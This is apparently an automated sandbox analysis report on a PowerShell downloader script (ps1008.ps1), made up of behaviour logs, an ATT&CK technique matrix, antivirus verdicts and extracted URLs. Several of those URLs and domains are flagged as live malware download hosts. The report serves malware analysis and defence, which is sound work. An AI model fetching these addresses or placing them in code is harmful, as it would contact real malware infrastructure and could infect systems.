    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    21
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable Media3
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput Capture3
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    ps1008.ps163%ReversingLabsScript-PowerShell.Downloader.Donoff
    ps1008.ps1100%AviraTR/PowerShell.Gen
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://yourmother4cancer.info100%Avira URL Cloudmalware
    http://abakus-biuro.net//a9zqemmh0%Avira URL Cloudsafe
    http://bemnyc.com/u8erijeq100%Avira URL Cloudmalware
    http://fenett2018.com100%Avira URL Cloudmalware
    https://status.squarespace.com0%Avira URL Cloudsafe
    http://habarimoto24.com0%Avira URL Cloudsafe
    http://bemnyc.com0%Avira URL Cloudsafe
    http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23100%Avira URL Cloudmalware
    http://eastend.jp/bl5kfa100%Avira URL Cloudmalware
    http://eastend.jp100%Avira URL Cloudmalware
    http://fenett2018.com/dobgx100%Avira URL Cloudmalware
    http://abakus-biuro.net//a9zqemm100%Avira URL Cloudmalware
    http://abakus-biuro.net0%Avira URL Cloudsafe
    http://crl.microsoft.00%Avira URL Cloudsafe
    http://habarimoto24.com/nh0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    eastend.jp
    162.43.104.133
    truefalse
      unknown
      bemnyc.com
      198.185.159.145
      truefalse
        unknown
        fenett2018.com
        unknown
        unknownfalse
          unknown
          yourmother4cancer.info
          unknown
          unknownfalse
            unknown
            habarimoto24.com
            unknown
            unknownfalse
              unknown
              abakus-biuro.net
              unknown
              unknownfalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://bemnyc.com/u8erijeqfalse
                • Avira URL Cloud: malware
                unknown
                http://eastend.jp/bl5kfafalse
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.3504639343.0000014B4F50F000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://yourmother4cancer.infopowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://abakus-biuro.net//a9zqemmhpowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.microsoftpowershell.exe, 00000000.00000002.3596642981.0000014B57A90000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://go.micropowershell.exe, 00000000.00000002.3466876782.0000014B415D3000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://status.squarespace.compowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.microsoft.copowershell.exe, 00000000.00000002.3596642981.0000014B57A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://contoso.com/Licensepowershell.exe, 00000000.00000002.3504639343.0000014B4F50F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.3504639343.0000014B4F50F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://bemnyc.compowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.microsoft.powershell.exe, 00000000.00000002.3596642981.0000014B57A90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3597009536.0000014B57AE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://eastend.jppowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://go.microspowershell.exe, 00000000.00000002.3466876782.0000014B415D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://fenett2018.compowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/powershell.exe, 00000000.00000002.3504639343.0000014B4F50F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.3504639343.0000014B4F50F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://habarimoto24.compowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://fenett2018.com/dobgxpowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmp, ps1008.ps1false
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://habarimoto24.com/nhpowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmp, ps1008.ps1false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.3466876782.0000014B3F4A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.3466876782.0000014B3F4A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://abakus-biuro.net//a9zqemmpowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmp, ps1008.ps1false
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://crl.microsoft.0powershell.exe, 00000000.00000002.3596642981.0000014B57A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://abakus-biuro.netpowershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpfalse
